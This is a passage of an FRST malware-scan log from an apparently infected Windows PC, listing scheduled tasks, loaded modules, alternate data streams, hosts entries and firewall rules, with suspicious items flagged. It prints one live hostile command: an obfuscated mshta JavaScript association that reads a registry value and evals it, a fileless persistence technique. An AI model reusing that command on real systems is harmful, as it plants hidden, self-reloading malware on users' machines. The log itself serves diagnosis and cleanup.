Task: {943C6F8C-538C-4330-BD00-804B61854551} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-05-17] (Dropbox, Inc.)
Task: {9CD8C73F-D1E0-401E-9410-39227B26B287} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2016-11-14] (UCWeb Inc) <==== ATTENTION
Task: {A03341EB-33D9-4524-96E2-B09D58DF10D2} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {A4C3B71B-CCBA-421C-ABD1-F0411668E9F3} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2015-07-04] (Microsoft Corporation)
Task: {AF2A39A3-92CD-458B-B758-CCE5122F5507} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2016-11-14] (UCWeb Inc) <==== ATTENTION
Task: {B012FF16-E0C4-45EE-84CF-01CBBDF4280B} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2014-11-06] (ASUS)
Task: {B77346D1-BB77-4A89-8918-5AC762D5730A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-08] (Adobe Systems Incorporated)
Task: {DBEE9E01-0C88-4E81-AB2C-C0FC232B1674} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001UA => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-29] (Google Inc.)
Task: {E7C7AA33-4484-446C-92C5-C41E68E771D0} - System32\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E} => C:\Users\TAURUS~1\AppData\Local\{138B2~1\UNINST~1.EXE <==== ATTENTION
Task: {EB253050-93E1-4B69-8D42-821ADFB413CF} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2016-03-04] (AsusTek)
Task: {EE4BCC48-ED90-4F31-A174-C72C3F33F1B1} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001Core => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe [2016-07-29] (Google Inc.)
Task: {EE6AD082-F5FC-4A59-AC60-8D490229822E} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EF670223-6B31-4A5F-A086-851A31916BC6} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2016-03-08] (Realtek Semiconductor)
Task: {F57DB565-A472-45F4-97E5-26A56159365C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {F69376A3-8221-4492-A636-02057225E60E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-14] (Google Inc.)
Task: {F73A22CB-42C7-4179-9AE0-A13B5103E67E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2015-08-27] (Microsoft Corporation)
Task: {FE1434C9-3FF0-4C4E-90EE-93BF8B284105} - System32\Tasks\MorseToWords => c:\programdata\{7f5e5b86-f311-b350-7f5e-e5b86f316e1b}\2259928468936697749b.exe <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_23_0_0_207_pepper.exe
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001Core.job => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-3880736737-1765239813-1450978002-1001UA.job => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\MorseToWords.job => c:\programdata\{7f5e5b86-f311-b350-7f5e-e5b86f316e1b}\2259928468936697749b.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\{55FE86CA-FBAA-C670-0400-2FA61B21F28E}.job => 
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
Shortcut: C:\Users\taurus silver\AppData\Local\072a96d0\5c23265f.lnk -> C:\Users\taurus silver\AppData\Local\072a96d0\a220feca.bat ()
 
ShortcutWithArgument: C:\Users\taurus silver\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 15:18 - 2015-10-30 15:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-07-14 22:47 - 2015-07-26 11:27 - 01195920 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
2015-12-24 12:05 - 2016-03-08 14:42 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () C:\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () C:\_\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () D:\Arduino\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () D:\_jvm\local64spl.dll
2016-09-28 22:05 - 2016-09-28 22:05 - 00142336 ____H () D:\pendrive\local64spl.dll
2015-08-27 02:33 - 2015-07-04 22:09 - 00160424 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2015-05-06 04:23 - 2015-05-06 04:23 - 00418968 _____ () C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
2015-05-06 04:23 - 2015-05-06 04:23 - 02543768 _____ () C:\Program Files\Nitro\Pro 10\Nitro_KissMetrics.dll
2016-06-29 03:26 - 2016-11-14 19:04 - 00629648 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
2016-05-03 23:03 - 2016-06-15 04:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2014-10-31 02:57 - 2014-10-31 02:57 - 00016896 _____ () C:\Program Files\ASUS\ASUS FlipLock\FlipController.exe
2016-07-14 09:55 - 2016-07-01 12:48 - 02656408 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2014-10-31 02:57 - 2014-10-31 02:57 - 00012800 _____ () C:\Program Files\ASUS\ASUS FlipLock\WifiPowerManager.exe
2016-07-14 09:55 - 2016-07-01 12:48 - 02656408 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-08-17 18:51 - 2016-08-17 18:51 - 01864384 _____ () C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2015-12-25 03:52 - 2015-12-25 03:52 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-07-14 09:57 - 2016-07-01 11:48 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-07-14 09:55 - 2016-07-01 11:27 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-07-14 09:55 - 2016-07-01 11:21 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-14 09:55 - 2016-07-01 11:22 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-07-14 09:55 - 2016-07-01 11:24 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-05-03 23:03 - 2016-06-15 04:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-11-17 20:23 - 2016-11-14 19:11 - 02104208 _____ () C:\Program Files (x86)\UCBrowser\Application\5.7.16817.1002\UCAgent.exe
2015-08-27 02:37 - 2015-08-27 02:37 - 08901800 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2016-07-30 10:01 - 2016-07-01 14:39 - 00061968 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2016-07-30 10:01 - 2016-07-01 14:39 - 00110608 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2014-10-31 02:57 - 2014-10-31 02:57 - 00009216 _____ () C:\Program Files\ASUS\ASUS FlipLock\WMIProc.dll
2014-11-06 04:44 - 2014-11-06 04:44 - 00037424 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2014-11-06 04:44 - 2014-11-06 04:44 - 00124928 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 02941440 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\MessagingNativeCore.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 00583168 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\MessagingEntityExtractionProxy.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 01300992 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\MessagingNativeBase.dll
2016-05-14 20:36 - 2016-05-14 20:36 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-04-23 19:54 - 2016-06-15 04:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-06-04 01:53 - 2016-10-11 00:29 - 00035792 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00145864 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-06-04 01:53 - 2016-10-11 00:29 - 00100296 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-05-17 22:59 - 2016-10-11 00:29 - 00018888 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-05-17 22:59 - 2016-11-08 06:59 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-05-17 22:59 - 2016-10-11 00:29 - 00694224 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-06-04 01:53 - 2016-10-11 00:30 - 00123856 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 01682760 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00021312 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.crt.compiled._winffi_crt.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-11-12 03:18 - 2016-10-11 00:29 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-11-12 03:18 - 2016-10-11 00:31 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00116176 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-05-17 22:59 - 2016-11-08 06:59 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00025424 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.kernel32.compiled._winffi_kernel32.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00057808 _____ () C:\Program Files (x86)\Dropbox\Client\win32evtlog.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00246592 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00026456 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-08-07 10:04 - 2016-10-11 00:30 - 00241104 _____ () C:\Program Files (x86)\Dropbox\Client\_jpegtran.pyd
2016-11-12 03:18 - 2016-11-08 06:58 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00019776 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winerror._winffi_winerror.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.wininet._winffi_wininet.pyd
2016-06-04 01:53 - 2016-10-11 00:31 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00022352 _____ () C:\Program Files (x86)\Dropbox\Client\winverifysignature.compiled._VerifySignature.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-11-12 03:18 - 2016-10-11 00:27 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-11-12 03:18 - 2016-11-08 06:59 - 00031568 _____ () C:\Program Files (x86)\Dropbox\Client\enterprise_data.compiled._enterprise_data.pyd
2016-11-12 03:18 - 2016-11-08 06:49 - 00293392 _____ () C:\Program Files (x86)\Dropbox\Client\EnterpriseDataAdapter.dll
2016-11-12 03:18 - 2016-11-08 06:59 - 00084280 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
2016-11-12 03:18 - 2016-11-08 06:59 - 01826096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtCore.pyd
2016-05-17 22:59 - 2016-10-11 00:29 - 00083912 _____ () C:\Program Files (x86)\Dropbox\Client\sip.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00531248 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtNetwork.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 03928880 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWidgets.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 01972528 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtGui.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00133424 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKit.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00224056 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebKitWidgets.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00207672 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtPrintSupport.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00020288 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.user32._winffi_user32.pyd
2016-11-12 03:18 - 2016-10-11 00:33 - 00017864 _____ () C:\Program Files (x86)\Dropbox\Client\libEGL.dll
2016-11-12 03:18 - 2016-10-11 00:34 - 01631184 _____ () C:\Program Files (x86)\Dropbox\Client\libGLESv2.dll
2016-11-12 03:18 - 2016-11-08 06:59 - 00042808 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebChannel.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00168760 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtWebEngineWidgets.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00357680 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQml.pyd
2016-06-04 01:53 - 2016-11-08 06:59 - 00037192 _____ () C:\Program Files (x86)\Dropbox\Client\windisplaytoast.compiled._DisplayToast.pyd
2016-08-07 10:04 - 2016-11-08 06:59 - 00024904 _____ () C:\Program Files (x86)\Dropbox\Client\winffi.winhttp.compiled._winffi_winhttp.pyd
2016-05-17 22:59 - 2016-10-11 00:31 - 00060880 _____ () C:\Program Files (x86)\Dropbox\Client\win32print.pyd
2016-11-12 03:18 - 2016-11-08 06:59 - 00546096 _____ () C:\Program Files (x86)\Dropbox\Client\PyQt5.QtQuick.pyd
2014-09-04 03:03 - 2014-09-04 03:03 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\ProgramData\TEMP:85E5F208 [129]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Software\Classes\.scr: AutoCADScriptFile => C:\WINDOWS\system32\notepad.exe "%1"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Software\Classes\c5baa48d: "C:\WINDOWS\system32\mshta.exe" "javascript:R7doxY="ztyy";xk63=new ActiveXObject("WScript.Shell");e2hCK1YSQ="RaSIwNRm";y45hym=xk63.RegRead("HKCU\\software\\jvjtduhgj\\cdweuob");x2fbl="W1";eval(y45hym);u8ATtgjn="40kEBhbe";" <===== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\aeriagames.com -> hxxps://aeriagames.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\aeriagames.com -> hxxp://aeriagames.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\clonewarsadventures.com -> clonewarsadventures.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\freerealms.com -> freerealms.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\soe.com -> soe.com
IE trusted site: HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\sony.com -> sony.com
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 21:25 - 2016-06-15 03:02 - 00002183 ___RA C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1 lm.auslogics.com
127.0.0.1                   anchorfree.net
127.0.0.1                   rss2search.com
127.0.0.1                   techbrowsing.com
127.0.0.1                   box.anchorfree.net
127.0.0.1                   www.mefeedia.com
127.0.0.3                   www.anchorfree.net
127.0.0.2                   www.mefeedia.com
127.0.0.1                   anchorfree.us
127.0.0.1                   a433.com
127.0.0.3                   anchorfree.net
127.0.0.1                   rpt.anchorfree.net
127.0.0.1                   delivery.anchorfree.us/land.php
127.0.0.1                   hsselite.com
127.0.0.1                   www.hsselite.com
127.0.0.1                   anchorfree.net
127.0.0.1                   rss2search.com
127.0.0.1                   techbrowsing.com
127.0.0.1                   box.anchorfree.net
127.0.0.1                   www.mefeedia.com
127.0.0.3                   www.anchorfree.net
127.0.0.2                   www.mefeedia.com
127.0.0.1                   anchorfree.us
127.0.0.1                   a433.com
127.0.0.3                   anchorfree.net
127.0.0.1                   rpt.anchorfree.net
127.0.0.1                   delivery.anchorfree.us/land.php
127.0.0.1                   hsselite.com
127.0.0.1                   www.hsselite.com
127.0.0.1                   idb.iobit.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKLM\...\StartupApproved\StartupFolder: => "SoftEther VPN Client Manager Startup.lnk"
HKLM\...\StartupApproved\Run: => "SpywareTerminatorShield"
HKLM\...\StartupApproved\Run: => "SpywareTerminatorUpdater"
HKLM\...\StartupApproved\Run: => "NoVirusThanks Driver Radar Pro Startup"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "SoftEther VPN Client UI Helper"
HKLM\...\StartupApproved\Run32: => "WebStorage"
HKLM\...\StartupApproved\Run32: => "Aeria Ignite"
HKLM\...\StartupApproved\Run32: => "DLLSuite2016"
HKLM\...\StartupApproved\Run32: => "Autodesk Desktop App"
HKLM\...\StartupApproved\Run32: => "ProductUpdater"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "IDMan"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "Internet Download Accelerator"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "Office Timeline Performance Helper"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\StartupApproved\Run: => "uTorrent"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [TCP Query User{887A3FD3-A10C-4CB4-8DD1-6F37C30AEBE9}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{93FBF7DA-2CEA-4E35-AF68-64C374595AD3}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{D50B5078-5C7C-48CA-907A-709402E6CC27}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{70739D13-09C1-4910-89D1-AE1AB71D23F1}C:\users\taurus silver\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\taurus silver\appdata\local\akamai\netsession_win.exe
FirewallRules: [{F133B81F-8907-4A14-9EFE-21ED1B4CF585}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{2768CB42-D446-4479-A771-22D2E0FB52CB}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
FirewallRules: [{8D8EDAA9-330E-4CE2-B3BF-231C86E8F106}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe
FirewallRules: [{EEF6CBA0-260A-42AC-A9B7-8FF05F2B92C9}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe
FirewallRules: [{C299E124-6805-492B-9B96-E75D160A883E}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
FirewallRules: [{21B246E5-A029-48D6-8C66-59DA57723C2C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe
FirewallRules: [{52B7BA61-E441-4C49-8308-DCCBF21BC688}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{EB6AFAC3-8B24-4589-A769-222FDE858637}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
